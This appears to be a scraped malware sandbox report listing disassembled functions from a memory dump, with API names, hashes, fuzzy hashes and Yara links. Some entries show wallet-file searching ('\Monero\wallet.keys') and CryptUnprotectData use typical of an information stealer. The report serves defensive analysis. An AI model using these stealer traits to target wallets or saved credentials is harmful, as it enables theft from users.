                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: eb81ee018472174795faba2bb4579ce4613df5be94a77272241b2b0355028729
                              • Instruction ID: d3921db6c3dc035597bd6cabc3546800177101f575687fa74cd0223d4c3c8cbc
                              • Opcode Fuzzy Hash: eb81ee018472174795faba2bb4579ce4613df5be94a77272241b2b0355028729
                              • Instruction Fuzzy Hash: F411CCB4A00209DFDB05DF94D985BAE77B9FF88300F104568E91597390D774AE51CF61
                              Function 00DBF1EB Relevance: 4.1, Strings: 2, Instructions: 1561COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: W<{X$yF?N
                              • API String ID: 0-3006374243
                              • Opcode ID: f4d52f58a131d172ccfc2226181695fdc55a6f01df527f649d4b799e5e767820
                              • Instruction ID: 8f1d611674c7c8bf6acc47b3cb541b5e659c56bcd51d72519785f0297539bb2b
                              • Opcode Fuzzy Hash: f4d52f58a131d172ccfc2226181695fdc55a6f01df527f649d4b799e5e767820
                              • Instruction Fuzzy Hash: FCB2F4F390C2109FE3086E2DEC8567ABBE9EF94320F16492DEAC587744EA3558058797
                              Function 00DB8904 Relevance: 3.8, Strings: 2, Instructions: 1334COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: TI3n$v:?
                              • API String ID: 0-3113827137
                              • Opcode ID: e9b5210095d41e2ad02b18ae2052997a9d9cff1e7a38e10be2af33d97787887d
                              • Instruction ID: fd65d05678c2fba90321c98aa52e536eb3433c75ba97e3a94ff9e8807012a4bd
                              • Opcode Fuzzy Hash: e9b5210095d41e2ad02b18ae2052997a9d9cff1e7a38e10be2af33d97787887d
                              • Instruction Fuzzy Hash: 6C9207F3A0C2049FE304AE2DEC8567AB7E6EF94720F1A463DEAC5C7744E63558058792
                              Function 009EF68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A015B8,00A00D96), ref: 009EF71E
                              • StrCmpCA.SHLWAPI(?,00A015BC), ref: 009EF76F
                              • StrCmpCA.SHLWAPI(?,00A015C0), ref: 009EF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009EFAB1
                              • FindClose.KERNEL32(000000FF), ref: 009EFAC3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: c9fc8eafc4dc32af92a692200c9e31988f778257582d7775ca414fe53d44e41e
                              • Instruction ID: 5f4c2cf392590dbb0aabfbc9590847954f83af5dfbb978afad58db9d9b756058
                              • Opcode Fuzzy Hash: c9fc8eafc4dc32af92a692200c9e31988f778257582d7775ca414fe53d44e41e
                              • Instruction Fuzzy Hash: A1119AB180014DABDB14FB70DC55BFD7378AF50340F5086A5A61E57492EF702B4AC792
                              Function 00D35B66 Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ay
                              • API String ID: 0-3544545429
                              • Opcode ID: 24866636bc1ce9cc1a9885269cdb12921cb5b68b54f3c703d73fa38d723dd989
                              • Instruction ID: 5665a42dc3f4d1a857868dd029b8fb87ab66d2576cd4ce120e1153f990b178fe
                              • Opcode Fuzzy Hash: 24866636bc1ce9cc1a9885269cdb12921cb5b68b54f3c703d73fa38d723dd989
                              • Instruction Fuzzy Hash: 5B514EF3B1C7045BE3086E29EC95BBAFBD9DBD4324F1A453DE984D7380E97A58008651
                              Function 00CCC94A Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: JG7/
                              • API String ID: 0-2616090989
                              • Opcode ID: c5933db55820e759e25e92b1321713b92ee5a9d0fdb89571a8dc15a42a42da12
                              • Instruction ID: c38afa4a07c3fb7010255c7479c880fe8593afe83e8bfef77f919926d6780fc9
                              • Opcode Fuzzy Hash: c5933db55820e759e25e92b1321713b92ee5a9d0fdb89571a8dc15a42a42da12
                              • Instruction Fuzzy Hash: A4319EB26183049FE308BE29EC8677AF7E5EF50750F06892DE5C6C2340EA7568848B17
                              Function 00CBB093 Relevance: .2, Instructions: 189COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5e8b8cf3f0b0c9324e1831aa445beabc300c3f73838fb8d28e573c59a8f3f494
                              • Instruction ID: 4ae43da7db2ad0074cbfe05fdcca5c69f341f0ab789a54d201c95e5b46b3b421
                              • Opcode Fuzzy Hash: 5e8b8cf3f0b0c9324e1831aa445beabc300c3f73838fb8d28e573c59a8f3f494
                              • Instruction Fuzzy Hash: B55147F3F442155BE308592DEC99766B6CA9B94320F2B023EDA89E73C0ED799C0142D6
                              Function 00D7C3FA Relevance: .2, Instructions: 183COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b9a857b1af9e772554093859242b57c4ccefc60f823529e6be77aab5e75d8096
                              • Instruction ID: 0d4e0d407ad755a755362be267a0f476b2858aa761f92625296217e1365a5a04
                              • Opcode Fuzzy Hash: b9a857b1af9e772554093859242b57c4ccefc60f823529e6be77aab5e75d8096
                              • Instruction Fuzzy Hash: AE51E3F3A182149FF304AE29DCD577AB7D6EF94320F2A453DEBC887380D97958058652
                              Function 00E956FC Relevance: .2, Instructions: 179COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 494f22706f1cf44520f8cae987972a6c33d5001426ba8ebcaa90c9eafaa20395
                              • Instruction ID: 2c355adaa13307d49d6df4ef7dab26c571763e99c20352482abd5a961d493094
                              • Opcode Fuzzy Hash: 494f22706f1cf44520f8cae987972a6c33d5001426ba8ebcaa90c9eafaa20395
                              • Instruction Fuzzy Hash: C95118F360CA04DFEB16AE69EC45ABE77D5EB80310F26493FD6C296208FA3155419743
                              Function 00D886F4 Relevance: .2, Instructions: 170COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2e6192480a4ba7eaa3d3561d4839ec40af5e2e172957edd4d4ee23f61aff591b
                              • Instruction ID: 6ac20f088f6430c27769ba74d6b56c75fb4036c122201eadd1371daaf5739099
                              • Opcode Fuzzy Hash: 2e6192480a4ba7eaa3d3561d4839ec40af5e2e172957edd4d4ee23f61aff591b
                              • Instruction Fuzzy Hash: 195137B3A0C3145FF314AA2DDC85BBAB7D5EFD0320F16453DE6C883780EA7558018696
                              Function 00D927D8 Relevance: .1, Instructions: 138COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ee418d9b9a1f70447a592880affc5d9a471d5faa1c1455a638d85c165adc6729
                              • Instruction ID: d65c148ce3d28ae4ef17b4a076cee3470a8b0a056e193e9093fed9c1d64a0d5b
                              • Opcode Fuzzy Hash: ee418d9b9a1f70447a592880affc5d9a471d5faa1c1455a638d85c165adc6729
                              • Instruction Fuzzy Hash: CB41F3F3A092108FE3046E69DD8177AB7E6EF94320F16493DDAC487384EA7D49458B86
                              Function 00E5F219 Relevance: .1, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a21340e4257d7d9766eb2ad392c71ea44d283a6ec323861319b5ab5b431004d9
                              • Instruction ID: d546f7bf6c64566f2220477dff0f27082e55bde32a5ea58b4527a92233c46ee1
                              • Opcode Fuzzy Hash: a21340e4257d7d9766eb2ad392c71ea44d283a6ec323861319b5ab5b431004d9
                              • Instruction Fuzzy Hash: 0B3102B790D624DBD3012A68DD053BABBE4EB04722F26093DEFC9A3600E531994897C3
                              Function 00E17972 Relevance: .1, Instructions: 116COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
